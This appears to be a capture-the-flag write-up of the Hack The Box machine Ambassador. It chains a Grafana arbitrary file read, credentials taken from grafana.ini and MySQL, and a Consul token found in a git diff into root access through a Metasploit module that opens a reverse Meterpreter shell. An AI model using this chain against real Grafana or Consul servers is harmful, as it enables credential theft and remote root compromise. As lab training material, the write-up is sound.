Ambassador - HTB - Key Points

Target's IP:


22/tcp   open  ssh

80/tcp   open  http

3000/tcp open  ppp

3306/tcp open  mysql

Grafana on 3000 subject to unauthorized arbitrary file read, as per


Reading passwd, consul and grafana and developer are users on the box

Googling for common configuration files, we can read /etc/grafana/grafana.ini

# Either "mysql", "postgres" or "sqlite3", it's your choice
;type = sqlite3
;host =
;name = grafana
;user = root
# If the password contains # or ; you have to wrap it with triple quotes. Ex """#password;"""
;password =

# default admin user, created on startup
;admin_user = admin
# default admin password, can be changed before first start of grafana,  or in profile settings
admin_password = messageInABottle685427
# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm

do...21! is the password for user grafana on mysql

MySQL [whackywidget]> select * from users;


| user      | pass                                     |


| developer | YW...g== |


1 row in set (0.166 sec)

base64 for an...68, password for developer for ssh

developer@ambassador:~$ cat user.txt 


Checking for processes running as root, there is

/usr/bin/consul agent -config-dir=/etc/consul.d/config.d -config-file=/etc/consul.d/consul.hcl

In order to operate with the consul agent, however, we need a key

Checking for weird folders that we can access, there is a git repository that contains the key we need to interact with the consul agent

developer@ambassador:/opt/my-app$ git diff 33a53ef9a207976d5ceceddc41a199558843bf3c c982db8eff6f10f8f3a7d802f79f2705e7a21b55
diff --git a/whackywidget/ b/whackywidget/
index fc51ec0..35c08f6 100755
--- a/whackywidget/
+++ b/whackywidget/
@@ -1,4 +1,4 @@
 # We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
+# Export MYSQL_PASSWORD before running
-consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD

Once we have the key, we can start a service with an health check that runs any command as root. There is also a metasploit module to exploit consul service execution, as shown here:

msf6 exploit(multi/misc/consul_service_exec) > run
[*] Started reverse TCP handler on 
[*] Creating service 'JMIna'
[*] Service 'JMIna' successfully created.
[*] Waiting for service 'JMIna' script to trigger
[*] Sending stage (1017704 bytes) to
[*] Meterpreter session 1 opened ( -> at 2022-10-26 17:21:57 +0200
[*] Removing service 'JMIna'
[*] Command Stager progress - 100.00% done (763/763 bytes)
meterpreter > shell
Process 30708 created.
Channel 1 created.
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt

Merry hacking ;)

You'll only receive email when they publish something new.

More from emacab98
All posts